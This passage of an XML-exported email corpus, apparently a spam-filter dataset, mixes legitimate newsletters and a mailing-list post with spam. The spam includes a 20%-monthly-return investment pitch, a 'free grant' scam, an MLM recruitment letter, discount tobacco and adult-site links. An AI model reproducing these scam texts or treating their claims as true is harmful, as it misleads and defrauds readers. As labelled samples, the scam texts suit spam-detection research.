 &lt;A HREF="http://www.cnn.com/2002/SHOWBIZ/News/08/13/bassspace.hollywood.ap/"&gt;http://www.cnn.com/2002/SHOWBIZ/News/08/13/bassspace.hollywood.ap/&lt;/A&gt; &lt;/P&gt;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Marketing: Cowpoke Productions (&lt;a href="http://www.cowpokeproductions.com"&gt;cowpokeproductions.com&lt;/a&gt;).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value="http://newsletter.mediaunspun.com/index000018970.cfm"&gt;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COLUMN: 3 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;table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000018970.cfm&amp;XXDESXXissue_id=18970&amp;XXDESXXtitle=M%20E%20D%20I%20A%20%20U%20N%20S%20P%20U%20N"
 			 class="a226814927151492-footer_tellafriend"&gt;
 			&lt;font size=4&gt;TELL A FRIEND&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/div&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 			&lt;!-- COLUMN: 4 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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zzz-unspun@spamassassin.taint.org &lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org"&gt;Click here&lt;/a&gt; to be instantly removed from this list.&lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Ctxt"&gt;Click here&lt;/a&gt; to receive future messages in plain text format.&lt;br&gt;&lt;/font&gt;&lt;font face="verdana,arial" size="1"&gt;&lt;a
 href="http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org"&gt;Click here&lt;/a&gt; to change your subscriber information and preferences.&lt;br&gt;&lt;/font&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!--Ver. 7--&gt;
 		&lt;p&gt;&amp;nbsp;
        &lt;img src="http://machina.imakenews.com/E178767,5114587XXmediaunspunXX18970XXXXindex000018970.cfmXXemailXX5114587XXXX0Y0XX1" alt="" height="0" width="0"&gt;		 
 		&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------------=_1029331990-31627-4--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: brimful of...
</t>
  </si>
  <si>
    <t xml:space="preserve">So how did I miss, and how come I can't find, the fork post
 that explains the lyrics to Brimful of Asha?
 I first heard of the song while reading
 http://www.ottawa-anime.org/~eyevocal/beingupfront/
 but I had never heard it until I downloaded it among
 a bunch of other Fatboy Slim mixes.
 - Joe
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Discount Smokes
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam
 If you are fed up of being 'ripped off' by the British government every time you buy your tobacco, then you should visit our website, where you can now buy 4 cartons of cigarettes, or 40 pouches of rolling tobacco from as little as 170 Euros (approx 105 pounds), inclusive of delivery by registered air mail from our office in Spain.  
 Why pay more???
 Visit our website at
 http://www.cheapsmoking.com/?ID=2
 Best regards
 Sales Department
 Cheap Smoking
 Spain
 xay1992351y
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SA] High Returns, Safe Investment! 20% Monthly!
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
  (SafeInvestments@NiceReturns12.com) on Saturday, July 13, 2002 at 03:46:17
 ---------------------------------------------------------------------------
 Looking for a high return on your money?: .
 10%-20% Monthly Return On Your Secure Investment : .
  Audited From Multiple Agencies : .
 Start with as little as $500 dollars and start earning returns monthly!: .
 For Complete Details Email: MarylandClub@mol.mn : .
 To be removed email: RemoveFromList@Inbox.lv : .
 ---------------------------------------------------------------------------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</si>
  <si>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discreet penis enlargement 4623
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor="#7CB5F0"&gt;
 &lt;a href="http://teens.xxxfreehosting.com/hotteens/index.html"&gt;&lt;img border="0" src="http://members.aol.com/tjoyce/mail_01.gif" width="500" height="558" border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a href="mailto:flojo@btamail.net.cn"&gt;&lt;img border="0" src="http://members.aol.com/tjoyce/mail_02.gif" width="500" height="42" border=0&gt;
 &lt;/a&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 4623
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Grants! No credit checks,  No collateral!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;
 &lt;table bgcolor=3D"#FF6666" border=3D"2" width=3D"999" cellspacing=3D"0" ce=
 llpadding=3D"0"&gt;
   &lt;tr&gt;
     &lt;td colspan=3D"3" width=3D"999"&gt; &lt;hr&gt;&lt;font color=3D"#663399"&gt;&lt;b&gt;&lt;cente=
 r&gt;
 &lt;center&gt;
 &lt;FONT face=3Darial,helvetica&gt;
 &lt;font size=3D"7"&gt;&lt;center&gt;&lt;br&gt; Could YOU use a *FREE* GRANT?&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"6"&gt;This is a &lt;b&gt;&lt;i&gt;limited offer&lt;/b&gt;&lt;/i&gt; for all those in ne=
 ed of a Free Grant.&lt;br&gt;
   And those that qualify will be eligible for up to but, &lt;br&gt;
 not exceeding &lt;b&gt;&lt;font size=3D"7"&gt;$5,000,000&lt;font size=3D"6"&gt;&lt;/b&gt;. &lt;br&gt;
 Most FREE grants are from  &lt;i&gt;$10,000 To $156,000&lt;/i&gt;.
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;font size=3D"7"&gt;
 &lt;a href=3D"http://www.freehostchina.com/grant/web2pleasure/index.html"&gt; DO=
  I QUALIFY?&lt;/A&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;font size=3D"6"&gt;
 &lt;table bgcolor=3D"#CCFF33" border=3D"2" width=3D"700"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;&lt;FONT face=3Darial,helvetica&gt;
 &lt;font size=3D"6"&gt;DID YOU KNOW? &lt;font size=3D"5"&gt;&lt;br&gt;&lt;br&gt;
 No longer are Free Grants the domain of the privileged and choice few, &lt;br=
 &gt;
 but now they can be awarded to everyday people like &lt;b&gt;you&lt;/b&gt;.
 &lt;br&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt; &lt;br&gt;&lt;br&gt;  
 All applicants are treated EQUAL regardless of race, creed, financial situ=
 ation or credit stability.
 &lt;br&gt; &lt;br&gt;&lt;br&gt; 
 &lt;table bgcolor=3D"#CCFF33" border=3D"2" width=3D"700"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;&lt;FONT face=3Darial,helvetica&gt;
 &lt;font size=3D"6"&gt;THE BONUS&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"5"&gt;
 The best thing about the Free Grant Program is that it requires:&lt;br&gt;&lt;br&gt;
 &lt;b&gt; No &lt;/b&gt;credit checks, &lt;b&gt;No&lt;/b&gt; credit history information, &lt;b&gt;No&lt;/b&gt; =
 co-signers,&lt;br&gt;
  &lt;b&gt;No&lt;/b&gt; collateral, &lt;b&gt;No&lt;/b&gt; employment checks, &lt;b&gt;No&lt;/b&gt; income verif=
 ication,&lt;br&gt;
  &lt;b&gt;No&lt;/b&gt; higher education and even &lt;b&gt;No &lt;/b&gt;special skills.
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
  &lt;font size=3D"7"&gt;
 &lt;a href=3D"http://www.freehostchina.com/grant/web2pleasure/index.html"&gt;SEE=
  IF YOU QUALIFY NOW!&lt;/A&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;hr&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get the most out of your games and graphics! (CNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Shopper Newsletter: Sound &amp; Graphics Edition&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;div align="center"&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=4&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/hd_sound.gif" width="442" height="60" border="0" alt="CNET Shopper Sound &amp; Graphics Edition"&gt;&lt;br&gt;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&lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;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href="http://clickthru.online.com/Click?q=40-6Pp4Idn8V7JdoaleVXCHnpqL0wRR" &gt;Cyber Shot DSC-F707&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;2&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJ8NIFbDlRqm86ccJ_2d2ZR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;3&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeWiBS9X5cKzceCGFySNP8dR" &gt;Palm m515&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;4&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KYPv5F0DoaDkjVsTLZ8iR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;5&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJfPUF9POr1yZeU_u_KnPR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;table border="0" cellpadding="0" cellspacing="0" width="160"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr_CWulmeWLXZBXqONOVnR" &gt;&lt;img src="http://www.cnet.com/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt=" " align="absbottom" valign="bottom"&gt;&lt;/a&gt;&amp;nbsp;
 		&lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZrgRkM4Ku5w8PF_jEuwteR" &gt;&lt;b valign="top" class="m1"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;All most popular&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 						&lt;/font&gt;
 					&lt;/FONT&gt;
 &lt;!-- /Most Popular --&gt;
 &lt;BR&gt;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href="http://clickthru.online.com/Click?q=d4-E0SqQ0ExoejqJVw_4Mc3148lk6yR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVzw9GUELwTRnU3P83P5XlR" &gt;May's tech award&lt;/a&gt;&lt;p&gt;  
 &lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgwkMuFpZpeE4rbg6amtI4R" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XW8Src3ZfssDLfzpHOCerR" &gt;News.com: top CIOs&lt;/a&gt; &lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=28-A2wXIRd4w3AIlZcEL2t1VlTK8yiR" &gt;ZDNet: PeopleSoft &lt;/a&gt; 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;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&lt;/td&gt;
 											&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 &lt;!--Prime Feature--&gt;			&lt;table&gt;
 									&lt;TR&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;TR&gt;
 										&lt;TD&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;B&gt;Is your system acting a bit sluggish?&lt;/B&gt;&lt;P&gt;
 										Adding memory is an easy way to get the most out of your
 favorite game and graphics applications, but figuring out 
 what type to buy can be a difficult and frustrating proposition. 
 &lt;P&gt;
 CNET's all-in-one &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXmoXAHOG_7DQESNPe-i4R" &gt;&lt;B&gt;Check out CNET's new Memory Configurator&lt;/b&gt;&lt;/a&gt; makes finding the perfect 
 memory easy! Whether you're searching for desktop, notebook, 
 camera or PDA memory, your just a few clicks away from the 
 memory you'll need to make the most of your graphics hardware
 and software.
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6ZiOUX-PjHpx8lOheMncR" &gt;&lt;B&gt;Check out CNET's new Memory Configurator&lt;/b&gt;&lt;/a&gt;
 										&lt;/TD&gt;
 										&lt;TD valign=center&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;/TD&gt;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1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPH8ZgzAYywvjsK-FdLPRR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/20057233_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPzEOu-qPUywq2NRJSBTZR" &gt;&lt;B&gt;Leadtek WinFast A250 Ultra TD&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 128 MB DDR SDRAM&lt;BR&gt;
 								&amp;#149; GeForce4&lt;BR&gt;
 								&amp;#149; Dual display support&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$299&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzT5IIaxMGzeFOPq1FsnynR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8004655_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BwVDU-5AKLF5vLk7KCgFeR" &gt;&lt;B&gt;ATI All-In-Wonder Radeon 8500DV &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; All-in-one 3D, TV and video&lt;BR&gt;
 								&amp;#149; 64MB DDR, Tv-On-Demand&lt;BR&gt;
 								&amp;#149; Capture images and video&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$230&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=bc-zkPJQ6BdHnIiVufmobF8XEDxwcyR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9481751_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=d1-ulOzQpErJC-OiRY10-kl0aSxkZlR" &gt;&lt;B&gt;PNY Verto GeForce4 Ti 4600 &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 128 MB DDR SDRAM&lt;BR&gt;
 								&amp;#149; GeForce4&lt;BR&gt;
 								&amp;#149; AGP 4x &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$304&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=e6-qG8rQwyqDD8IMP4XGugH6NQYvU4R" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/7344531_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwFSu904-Pa9-0t3VVat9yR" &gt;&lt;B&gt;VisionTek Xtasy 6964&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Vertex &amp;amp; Pixel shaders &lt;BR&gt;
 								&amp;#149; 64MB DDR, 2048x1536 at 75Hz &lt;BR&gt;
 								&amp;#149; GeForce3 Ti500 chipset, AGP&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$141&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=11-l8riI2-4ELuVp-jX3VynhNBuCqlR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/7425583_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMHole0sJdBBBkqU8niQ74R" &gt;&lt;B&gt;ATI Radeon 7500 &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Dual display support&lt;BR&gt;
 								&amp;#149; 64MB, 2048x1536 res., TV out &lt;BR&gt;
 								&amp;#149; Full DirectX 8.1 support&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$82&lt;/font&gt;&lt;/B&gt;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&lt;p&gt;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 empowers you to compare 
 detailed product specifications feature-for-feature? 
 &lt;P&gt;
 Select the items you wish to compare from your customer-
 specific catalog of more than 250,000 SKUs. The product 
 comparison highlights differences between the products 
 in red, allowing your sales reps and customers to easily 
 identify the main differences between each product selected. 
 This comparison can then be e-mailed to your customers to
 assist them in making a more informed buying decision.
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdHnvGBLjnFPcZsjpRp-LrR" &gt;&lt;B&gt;Sign up now&lt;/b&gt;&lt;/a&gt; to gain access to the most complete, accurate,
 and timely product data available. 
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0XgZWr3ewASOnO8CtmMgRR" &gt;&lt;B&gt;Tell me more about ChannelOnline.&lt;/b&gt;&lt;/a&gt;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href="http://clickthru.online.com/Click?q=65-K82zIDPtIgiqCGwD70VOf0m8P9ZR" &gt;Tech Trends&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7a-EE_AIPBjUrAV1SvhU6coezkBZXdR" &gt;Hardware&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_Idqh3o6PxVb8HYULuonXiR" &gt;Software&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTa_wVQbpsIC1b2OB8OEPR" &gt;Shopping&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpKAWYYXJMxhOmI_uIUEknR" &gt;Downloads&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw2Hw8BMXfJaylIO7r3fxeR" &gt;News&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkWGjK8vmqI81u0PT_Qv1yR" &gt;Investing&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f9-mtKTQxOWPQlaxDjSM_svdGheo-lR" &gt;Electronics&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=0e--eOTIiQzHx9KS3m4r8dJx98lbK4R" &gt;Web Building&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=23-sFcGINM8KMuanIMiAv2Y9ZZvQKrR" &gt;Help &amp; How-Tos&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=38-bLkmIRM2PYwCXkfnhJiSUxuD-DiR" &gt;Internet&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZDjpniKhXdaB0S22bbKAZR" &gt;Games&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePgpIELaiPG9TmIKJ15BRdR" &gt;Message Boards&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUDup7EEOR5vnMUN5xspoRR" &gt;CNET TV &amp; Radio&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7notyaDgXpIiSupcptbPMPR"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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=a2-6-X7rUZdFzITixq_C6UaDWKGgzzzw09RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8Jxs5Rk1OJ0NpbnpTbdL3eR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oq5a3CCOX7qeZDozn6f5yR"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href="http://clickthru.online.com/Click?q=e1-6RvNQxk2Egzmw-yPhsYK3Awi9qlR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f6-QktIQMwrVvaCP-aYYRGOT9_Jmp4R" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=0c-_Y3DIc8H37pRK0XWDjP2qJ13b4yR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdDDu9oGQxoQqYoj1cTQ4lR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=36-wg7-IiI4fXKCfoTMxvH3QainXQ4R" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=4b-k_l7IBUPLWWY3dTP9VA35c54JMcR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e444&amp;ISSUE=2002-07-12" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=60-oqKtnRElxX6bnk2K-LY1fYx4LRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Honest Family Oriented Home based business with residual income on the net.  Get involved! anvx
</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------
 Note: Your e-mail address was added to a database by you.
 I am sending my advertisement to this database and, if 
 you are not interested in receiving ads similar to mine, 
 It would be in your best interest to click the below link 
 and opt-out of our mailings by simply adding your address 
 to our globalBlock List. Your e-mail address will NOT be 
 sold, validated or used in other mailings,as it belongs 
 to you and only you , we respect that!
 ---------------------
 ...............&gt; For your Free Membership, Click this link: 
 mailto:teamsuccessrequest@yahoo.com?subject=I_Want_A_Free_Membership
 Be sure to include your first and last name in the body of the leter
 Or to be removed from my mailing list, Click this link:
 mailto:teamsuccessrequest@yahoo.com?subject=remove 
  Is this what you're looking for...
 1.  DO: Want to work from home?
 2.  DO: Want to build yourself an income you can be proud of?
 3.  DO: Want to be able to tell your friends and family about 
 what you're doing... instead of keeping it a secret so they 
 don't laugh (I've been there, I know)?
 4.  DO: Want to be able to produce a copy of your check to 
 any one interested b in this business?
 5.  DO: Want to have A Monthly Income which can be passed 
 on when your time is up?
 6.  DO: Want to be in a team business which gives you the 
 chance to help other people AND get paid for it?
 7.  NOT: Want to be scammed?
 8.  NOT: Want to spend all your time recruiting?
 9.  NOT: Want to talk to people on the phone?
 10. NOT: Wanting to be involved with a"get rich quick"program?
  Please, do yourself a favor and check this out.  
 It's absolutely FREE 
 to get more information and you may cancel at ANY time!
 .......&gt; For your Free Membership, Click this link: 
 mailto:teamsuccessrequest@yahoo.com?subject=I_Want_A_Free_Membership
 Be sure to include your first and last name in the body of the leter
 Or to be removed from my mailing list, Click this link:
 mailto:teamsuccessrequest@yahoo.com?subject=remove 
  IT DOES NOT MATTER WHERE YOU LIVE!  This is an International 
 business with people all over the world (over 160 different 
 countries involved)!   Join our TEAM and you will succeed!  
 We have the people, the knowledge and the ability to guide you... 
 step by step... to a profitable business.
 I AM NOT going to hype you up with Stuff trying to get you involved.
 In fact, if you think you're going to make money overnight with this,
 please do NOT click on the link. Simply remove yourself from this 
 list (instructions below).
 The difference between this online business and an offline business 
 is that the tools you need for proven success... are given to you 
 for FREE after you decide to create your own successful business!  
 To verify what I'm saying, ask any local business person if they 
 were given the tools they needed to make their business the success 
 it is, for free when they started out.They'll laugh at the question!
 You DO NOT need...
 1.  A small fortune to get started.
 2.  A lot of "business knowledge" or "business contacts" to get started.
 3.  To commute anywhere, talk to anyone or buy any items to get started.
 Everyday hundreds of people join for free and get the free information 
 theyneed to succeed.  When they see that they too can make money with 
 this business, they get involved.  There are already over 2 million 
 people who have joined for free to check things out.  This business has 
 been thriving for over five years!
 Do you have...
 A.  An internet connection.
 B.  One or two hours a day to build your business.
 C.  The ability to ask and receive all the help you need to succeed.
 D.  The drive to succeed.
 E.  The need for extra income each and every month.
 Then YOU TOO can make MORE money for you and your family and you too 
 can run your own profitable business!
 This is probably the only business in the world where you personally 
 reap all the rewards from your personal efforts and not those above 
 you getting it instead of you (i.e. your boss).
 I want to help YOU to make money on the 'net as part of our successful
